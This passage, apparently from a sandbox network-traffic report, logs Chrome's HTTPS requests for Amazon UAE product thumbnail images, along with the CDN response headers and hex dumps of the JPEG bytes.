                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 08 09 05 07 01 06 02 03 04 0a 01 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 01 02 04 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b2 01 b9 88 6e 00 00 00 1c
                                                                                                                                                                                                        Data Ascii: JFIFt"9n
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 6d 10 66 d7 16 d8 32 9d d0 09 23 be 3d 51 68 05 fd af a2 87 37 90 1c 2b e4 5e 51 22 b7 6e 5f 93 23 86 fe 4f 55 b8 37 e4 44 b4 4e 2b 24 24 9f 80 f1 37 b1 55 d4 7d 9e 61 35 b8 02 76 5d f7 7e 3e 5f 2e 5f 76 ef 8e fb 70 89 4c f6 47 07 50 b8 4b 6c b8 ec e9 5f 5d ff 00 6f d7 e5 91 87 e8 85 91 d8 34 37 b8 d6 47 30 9f bd b8 38 ad 34 fe cf 88 11 ac ff 00 3b d9 ab fa 6f 43 69 29 ba b5 54 9e 71 18 ac 3d 8b 0f f7 84 80 b9 1e 8b 10 2f f0 d1 4b 4d 78 51 a6 6f dd 3a be 0a 9a c6 41 c5 da ef 65 b4 2a 76 43 f4 89 1a 32 d8 3b ab 51 5c 51 c3 1b 35 94 36 1c fe e4 82 e5 e5 61 20 19 97 c8 66 b9 2f c9 ca f6 fb b7 93 e9 dd d7 6c 5c e1 e2 e4 6d 91 8d 1e 95 ae 6e c5 dd 4b f7 57 d7 75 79 52 d8 46 3b b0 78 94 8b 37 5f 30 92 5c 3d 0e 25 ef 7e 19 48 8a fc f0 1e d4 e5 f2 53 0c 7b ca 00
                                                                                                                                                                                                        Data Ascii: mf2#=Qh7+^Q"n_#OU7DN+$$7U}a5v]~>_._vpLGPKl_]o47G084;oCi)Tq=/KMxQo:Ae*vC2;Q\Q56a f/l\mnKWuyRF;x7_0\=%~HS{
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: aa 67 6e 10 8c 4d cf a9 25 51 a4 b4 95 ac c0 9d 2b a7 35 52 0f 2a 34 4a a3 46 f9 24 04 0b c7 cb ea fd 91 da 85 e7 38 88 5d 51 cf 1a e6 05 e3 0f 3c 58 0b 00 80 5b 36 d5 ac c6 71 17 9c f3 c7 86 10 e6 f9 06 b0 cb 9d f5 a2 72 97 d6 9d b3 62 92 82 4f 39 b8 6b 3e 22 c7 f9 71 2d 50 ff 00 57 f2 7a 2f a3 2d 56 a6 f0 08 24 24 91 ba a3 e1 ac 7f 90 92 1d c7 88 10 ea 16 23 de 53 b1 ad 87 e0 33 f3 18 78 89 23 97 92 66 27 38 f4 a8 d0 ce 70 2e c4 84 7e 22 40 be 71 71 1d a7 a9 75 45 a1 d1 6a a3 43 a6 c4 ea 44 01 e1 36 32 93 2f b2 92 6b 22 05 ce 0f 9f f6 a0 89 40 b3 45 f9 df ff 00 22 0f 66 1a 4a 05 53 65 a3 67 c1 66 12 7c 18 62 2c 3f ce a8 e1 1e 22 03 db ab 0a f3 58 b5 42 9d 8e 7f 53 af 2f 5e fb 1d c0 6d 5a a9 ee 50 d0 42 b8 44 37 d4 46 71 4e 1f cb a8 e9 19 07 ab 5a c6 61
                                                                                                                                                                                                        Data Ascii: gnM%Q+5R*4JF$8]Q<X[6qrbO9k>"q-PWz/-V$$#S3x#f'8p.~"@qquEjCD62/k"@E"fJSegf|b,?"XBS/^mZPBD7FqNZa
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1069INData Raw: b3 4d 5e c4 1a a9 48 03 41 71 dc 37 b8 90 27 af 52 bc ac 9a f8 f9 64 b4 52 50 75 08 4c 08 92 20 40 8d 75 e9 f9 b2 83 77 1b 35 5c f9 ba 76 37 8e 37 ea ff 00 91 75 0a 48 f1 3a 1d a7 f5 f9 b9 39 91 fb 22 c3 dc db 31 cb ef 87 3b 2d 12 85 a6 7c 7e 19 4f 74 e8 2b 51 bd cf 4e 8c ce cc ee 97 4d ee 96 0b 5d fc f6 f7 2a 55 27 52 77 3e fa dc 7b 1e b8 3f 8a 5c ab ae ee fd f3 bf e1 ee 89 34 0d 33 3d b0 00 23 f0 13 1f 5f 03 db ab 0c 5e b6 36 df 5e c9 9a a1 53 39 4f dd ef d8 a4 1e e4 91 3a 99 0a 10 a9 00 83 1e 44 75 7f 8d 5e f6 ff 00 09 66 53 71 11 10 8b b1 1f d2 3e 91 b3 f4 8d 78 8e 87 05 fc 7d e2 d5 c3 29 25 c1 00 ca a5 46 06 c1 dc 92 4f e7 20 90 4f 4c 6c 76 18 eb 75 b3 4b 5a 0d 3b 3a 33 da 26 63 43 f3 88 dc 7c ef 5c 77 8d bd 39 db 3c 5c 37 83 78 88 24 eb 67 5e 75 e7
                                                                                                                                                                                                        Data Ascii: M^HAq7'RdRPuL @uw5\v77uH:9"1;-|~Ot+QNM]*U'Rw>{?\43=#_^6^S9O:Du^fSq>x})%FO OLlvuKZ;:3&cC|\w9<\7x$g^u


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        41192.168.2.449805151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2589
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 119c465a-1b4b-4a2d-92c5-de6e76d91a53
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 26 Apr 2044 08:00:37 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1639014
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100151-IAD, cache-nyc-kteb1890081-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9b 00 01 00 03 00 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 08 03 04 05 02 01 09 10 00 02 02 02 01 02 04 02 06 07 04 0b 00 00 00 00 01 02 00 03 04 11 05 06 12 07 13 21 31 41 51 14 22 61 71 91 b1 15 52 53 81 82 93 a1 23 32 72 d3 08 16
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQ"aqRS#2r
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1211INData Raw: 84 34 79 59 3c 87 d9 45 12 ae ef 85 ca 9f 5b bf a2 f1 88 89 cb b6 c8 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 9c b8 d4 f9 b7 53 ed a4 2c 4e fe 5d ac bf 99 9c 53 9f 19 bb 5f f8 1e 59 d3 f1 58 bd 50 6c 77 37 79 fc ff 00 49 e3 72 95 d9 55 49 45 62 c0 03 6a 95 4e fd 1d 8e ed 01 bf df bd 4c ef c2 65 e5 74 5f 5a f3 fc 7a ab df dd 5d 6c 16 94 2c be 75 41 32 71 c3 7e a8 23 74 16 f6 1e 6c d4 34 d9 f5 d7 ef 13 34 73 5d 4d 7f 13 e2 27 51 1a ed ec 47 38 c1 f7 a2 bf 51 2a ad 49 fe 26 9d 4b 11 ec 64 f8 7a 9c 8f 2b c5 df 87 c3 53 46 1e 20 bc 5b 55 c5 2b 7c 91 61 7e c6 70 a2 d4 26 b5 20 ae f7 b6 95 07 8b 7d 0d c9 f0 b9 97 72 03 01 68 c0 76 45 a8 d2 c1 e9 4d 2a a6 9b 5a ec 2e 41 72 0a 81 b7 9b 5f 07 95 ba d0 3d 53 44 7b aa 8f fe ca 63 fd 20 f9 67 4e 0d 71 52 ed
                                                                                                                                                                                                        Data Ascii: 4yY<E[S,N]S_YXPlw7yIrUIEbjNLet_Zz]l,uA2q~#tl44s]M'QG8Q*I&Kdz+SF [U+|a~p& }rhvEM*Z.Ar_=SD{c gNqR


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        42192.168.2.449808151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2170
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: e642ed37-6866-4bd4-b0d8-3e5393c23c98
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 26 Apr 2044 08:00:37 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 168003
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200139-IAD, cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 95 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 01 06 07 08 02 03 04 09 10 00 02 02 01 03 00 05 07 08 07 09 01 00 00 00 00 00 01 02 03 04 05 11 12 06 21 31 41 71 13 23 32 51 61 a1 b1 07 22 52 72 74 91 92 c1 14 33 43 63 83 b3
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1Aq#2Qa"Rrt3Cc
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC792INData Raw: 61 f1 68 85 d1 75 1b 30 32 a8 b6 88 b7 64 65 5e dc 64 e1 27 bc 54 78 ee 9c 5a e4 9b 5d ab 7d c9 1c e7 be 3d de 0b e2 88 ba 35 2d 43 c8 c3 1f 1e fb b8 26 b6 a6 13 92 8e ef e8 a4 fb 77 ee db bc 86 93 5c 99 e3 bb 9b 4e 3b 97 75 39 51 cc b3 58 b5 51 3a 9c b4 db 5b 73 f4 ac 7c eb de 6d 7a e5 eb 2d cd 26 7b ab d7 b6 af eb 24 f4 e5 94 b1 f3 6c c9 b3 79 3c 5c b8 70 94 f7 ba 3c 55 73 6e 50 7b cd 46 5c 96 d2 7d ad 49 2e c6 44 69 1f b6 fe 1f f5 93 29 2d 24 46 5c 95 75 57 7d df 2c b9 34 3b 7c 96 a7 85 2f df d6 bf 13 e1 f9 9b 05 89 73 85 d8 9f 6a c4 f7 df 5a 35 bb 1e cf 25 93 4c fe 85 d5 3f c3 24 cd 87 a6 69 df 88 bf ce 61 ff 00 f4 56 32 7d 75 f8 cd 71 e4 8c f0 ca 15 7d ac a1 4d 2c 80 00 00 00 00 00 00 00 00 00 00 00 00 00 0a f6 ee bd 8f e0 50 12 9e 9a 64 35 b4 d1 f3
                                                                                                                                                                                                        Data Ascii: ahu02de^d'TxZ]}=5-C&w\N;u9QXQ:[s|mz-&{$ly<\p<UsnP{F\}I.Di)-$F\uW},4;|/sjZ5%L?$iaV2}uq}M,Pd5


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        43192.168.2.449804151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1912
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 05904073-7c1d-4d18-883c-b1593291b8ba
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 15 Jul 2044 14:45:00 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1297806
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100171-IAD, cache-ewr-kewr1740056-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 91 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 05 06 01 04 02 03 07 08 10 00 02 01 03 03 01 06 03 05 06 07 00 00 00 00 00 00 01 02 03 04 11 05 12 21 31 06 13 22 41 51 71 07 32 61 43 62 72 81 91 23 33 34 42 a1 d2 14 16 52 63 b1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQq2aCbr#34BRc
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC534INData Raw: 68 bb ba ea e2 0d 3d fe 2c b5 19 74 5b 73 18 b7 1e 63 8e 8d 9d 55 35 5b 6a 92 8b 70 92 f1 71 89 74 e1 e0 b5 4f b1 1a 44 ba 5b 6c fc 15 6a 43 fa 29 a4 68 55 f8 7d a7 cf e4 9d 78 7b 55 4f a7 e2 8c 8c ef 1f 17 07 05 a2 6f 3b 34 46 a5 0e e2 a9 34 ee 96 45 eb f9 dd 90 3d 86 6e ae ad ab d5 4f 11 6e 49 53 f4 8a ee f6 3c f4 e7 93 d5 88 5d 17 41 a1 a3 c6 aa a2 e5 39 54 96 65 39 b4 e4 d2 ce d8 f0 a2 b1 1c 93 46 6a b5 14 e7 75 f8 21 56 aa 9d 47 28 ec 00 05 65 60 00 00 00 00 00 00 15 9e da 6b 53 d0 f4 8b fb da 79 df 0a 78 84 92 ce c9 54 6a 9a 9b f4 50 72 dc 7c 4b 18 39 4d 26 7d ff 00 28 a9 a9 46 49 35 24 d3 8b 59 4d 3e 1a 69 f0 d3 5d 51 e4 1a d7 c1 9d 36 f2 a3 ad 61 56 56 6d f5 82 8f 7d 47 f2 83 71 71 f6 52 3d 4e 9f d5 28 e1 e3 28 54 e7 5b 98 b1 58 2a 95 5a 94 49 3f
                                                                                                                                                                                                        Data Ascii: h=,t[scU5[jpqtOD[ljC)hU}x{UOo;4F4E=nOnIS<]A9Te9Fju!VG(e`kSyxTjPr|K9M&}(FI5$YM>i]Q6aVVm}GqqR=N((T[X*ZI?


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        44192.168.2.449809151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1685
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 29b0ac12-468b-412f-b0ea-83cb63db53bb
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 26 Apr 2044 08:00:37 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 200231
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100032-IAD, cache-ewr-kewr1740028-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8e 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 07 03 04 06 01 02 08 10 00 02 02 01 02 04 03 06 05 04 03 00 00 00 00 00 00 01 02 03 04 05 11 06 12 21 31 13 32 51 07 41 42 61 71 91 14 22 52 81 a2 16 a1 b1 b2 62 92 93 01 01 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!12QABaq"Rb
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC307INData Raw: fb 2d 96 ed bd b7 6c cf c3 f1 0c 25 2b 23 37 d1 b6 cd 7e 6f 87 25 e4 aa 75 f4 92 4a 27 e9 58 da 98 73 df b1 43 4f 88 b5 96 b9 56 7c 63 f3 58 90 e6 ff 00 6d 8d 0b de 56 a0 9c 72 b2 ef c8 4f e0 e7 75 57 ff 00 58 6c ff 00 91 9d 2e 56 88 ad ec c2 8f 0d 91 2e 8c f8 d7 f5 17 ab 71 9d 37 e9 f3 53 5a 6e 2a af c4 5d 60 ad 9b b3 9d 27 d9 b5 1b 0b bf 0a 17 c6 11 f1 67 bb 2b 9e 12 e1 b7 8f 64 67 e1 aa e1 1f 2c 22 94 62 be 89 16 a9 c9 72 59 ea fb dc 91 d5 e0 61 7a 14 46 00 00 6b 8c e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ad 2c 3a a5 2e 77 15 b9 b2 0f 53 68 f3 47 89 24 b6 23 f2 34 aa 32 3a ce 24 88 0a 6d 3d a0 e2 9f 46 73 df d3 58 bb f9 4d ea 34 8c 7a 3c b0 44 98 24 ef 9b ee c8 aa 60 bb 23 c8 c5 47 a2 3d 00 81 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: -l%+#7~o%uJ'XsCOV|cXmVrOuWXl.V.q7SZn*]`'g+dg,"brYazFk,:.wShG$#42:$m=FsXM4z<D$`#G=0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        45192.168.2.449807151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
